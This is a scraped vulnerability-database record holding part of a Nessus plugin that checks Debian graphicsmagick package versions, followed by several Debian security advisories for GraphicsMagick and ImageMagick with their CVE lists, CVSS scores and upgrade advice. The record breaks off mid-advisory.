script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-03-26T20:20:00", "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-27T21:28:32", "type": "debian", "title": "[SECURITY] [DLA 1401-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-06-27T21:28:32", "id": "DEBIAN:DLA-1401-1:A41C0", "href": "https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-22T13:49:08", "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-27T21:28:32", "type": "debian", "title": "[SECURITY] [DLA 1401-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-06-27T21:28:32", "id": "DEBIAN:DLA-1401-1:300F8", "href": "https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-22T13:06:10", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u16\nCVE ID : CVE-2017-17498 CVE-2017-17500 CVE-2017-17501\n CVE-2017-17502 CVE-2017-17503 CVE-2017-17782\n CVE-2017-17912 CVE-2017-17915\nDebian Bug : 884905\n\nThe NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-08T13:31:31", "type": "debian", "title": "[SECURITY] [DLA 1231-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-01-08T13:31:31", "id": "DEBIAN:DLA-1231-1:8E55F", "href": "https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T04:06:42", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u16\nCVE ID : CVE-2017-17498 CVE-2017-17500 CVE-2017-17501\n CVE-2017-17502 CVE-2017-17503 CVE-2017-17782\n CVE-2017-17912 CVE-2017-17915\nDebian Bug : 884905\n\nThe NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-08T13:31:31", "type": "debian", "title": "[SECURITY] [DLA 1231-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-01-08T13:31:31", "id": "DEBIAN:DLA-1231-1:C59AA", "href": "https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T04:24:12", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u4\nCVE ID : CVE-2016-7446 CVE-2016-7447 CVE-2016-7449 CVE-2016-7800\nDebian Bug : \n\n\nVarious security issues were found and fixed in graphicsmagick in Debian\nwheezy LTS.\n\nCVE-2016-7446\n\n Heap buffer overflow issue in MVG/SVG rendering.\n\nCVE-2016-7447\n\n Heap overflow of the EscapeParenthesis() function\n\nCVE-2016-7449\n\n TIFF related problems due to use of strlcpy use.\n\nCVE-2016-7800\n\n Fix unsigned underflow leading to heap overflow when\n parsing 8BIM chunk.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.3.16-1.1+deb7u4.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n- -- \nBrian May &lt;bam@debian.org&gt;", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-11T06:40:00", "type": "debian", "title": "[SECURITY] [DLA 651-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7449", "CVE-2016-7800"], "modified": "2016-10-11T06:40:00", "id": "DEBIAN:DLA-651-1:36F8B", "href": "https://lists.debian.org/debian-lts-announce/2016/10/msg00007.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T13:35:52", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u9\nCVE ID : CVE-2017-12935 CVE-2017-12936 CVE-2017-12937 CVE-2017-13063\n CVE-2017-13064 CVE-2017-13065 CVE-2017-13776 CVE-2017-13777\n\n\nCVE-2017-13776\nCVE-2017-13777\n denial of service issue in ReadXBMImage()\n\nCVE-2017-12935\n The ReadMNGImage function in coders/png.c mishandles large MNG\n images, leading to an invalid memory read in the\n SetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936\n The ReadWMFImage function in coders/wmf.c has a use-after-free\n issue for data associated with exception reporting.\n\nCVE-2017-12937\n The ReadSUNImage function in coders/sun.c has a colormap\n heap-based buffer over-read.\n\nCVE-2017-13063\nCVE-2017-13064\n heap-based buffer overflow vulnerability in the function\n GetStyleTokens in coders/svg.c\n\nCVE-2017-13065\n NULL pointer dereference vulnerability in the function\n SVGStartElement in coders/svg.c\n\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-31T20:21:30", "type": "debian", "title": "[SECURITY] [DLA 1082-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2017-08-31T20:21:30", "id": "DEBIAN:DLA-1082-1:FA56E", "href": "https://lists.debian.org/debian-lts-announce/2017/08/msg00034.html", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-18T23:58:55", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4321-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 16, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : graphicsmagick\nCVE ID : CVE-2017-10794 CVE-2017-10799 CVE-2017-10800 CVE-2017-11102 \n CVE-2017-11139 CVE-2017-11140 CVE-2017-11403 CVE-2017-11636 \n CVE-2017-11637 CVE-2017-11638 CVE-2017-11641 CVE-2017-11642 \n CVE-2017-11643 CVE-2017-11722 CVE-2017-12935 CVE-2017-12936 \n CVE-2017-12937 CVE-2017-13063 CVE-2017-13064 CVE-2017-13065 \n CVE-2017-13134 CVE-2017-13737 CVE-2017-13775 CVE-2017-13776 \n CVE-2017-13777 CVE-2017-14314 CVE-2017-14504 CVE-2017-14733 \n CVE-2017-14994 CVE-2017-14997 CVE-2017-15238 CVE-2017-15277 \n CVE-2017-15930 CVE-2017-16352 CVE-2017-16353 CVE-2017-16545 \n CVE-2017-16547 CVE-2017-16669 CVE-2017-17498 CVE-2017-17500 \n CVE-2017-17501 CVE-2017-17502 CVE-2017-17503 CVE-2017-17782 \n CVE-2017-17783 CVE-2017-17912 CVE-2017-17913 CVE-2017-17915 \n CVE-2017-18219 CVE-2017-18220 CVE-2017-18229 CVE-2017-18230 \n CVE-2017-18231 CVE-2018-5685 CVE-2018-6799 CVE-2018-9018\n\nSeveral vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFor the detailed security status of graphicsmagick please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/graphicsmagick\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-16T21:57:57", "type": "debian", "title": "[SECURITY] [DSA 4321-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10794", "CVE-2017-10799", "CVE-2017-10800", "CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11403", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-11722", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-14314", "CVE-2017-14504", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15277", "CVE-2017-15930", "CVE-2017-16352", "CVE-2017-16353", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2017-18219", "CVE-2017-18220", "CVE-2017-18229", "CVE-2017-18230", "CVE-2017-18231", "CVE-2018-5685", "CVE-2018-6799", "CVE-2018-9018"], "modified": "2018-10-16T21:57:57", "id": "DEBIAN:DSA-4321-1:D5514", "href": "https://lists.debian.org/debian-security-announce/2018/msg00252.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-29T06:40:24", "description": "Package : imagemagick\nVersion : 8:6.7.7.10-5+deb7u5\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make\nHTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715),\nmove (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the filename\nfor the insecure coders.\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n- -- \nBrian May &lt;bam@debian.org&gt;", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-23T02:34:38", "type": "debian", "title": "[SECURITY] [DLA 486-1] imagemagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-23T02:34:38", "id": "DEBIAN:DLA-486-1:42FF7", "href": "https://lists.debian.org/debian-lts-announce/2016/05/msg00039.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-26T01:24:29", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3580-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMay 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T17:37:08", "type": "debian", "title": "[SECURITY] [DSA 3580-1] imagemagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-16T17:37:08", "id": "DEBIAN:DSA-3580-1:70B04", "href": "https://lists.debian.org/debian-security-announce/2016/msg00157.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:14:51", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3580-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMay 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team 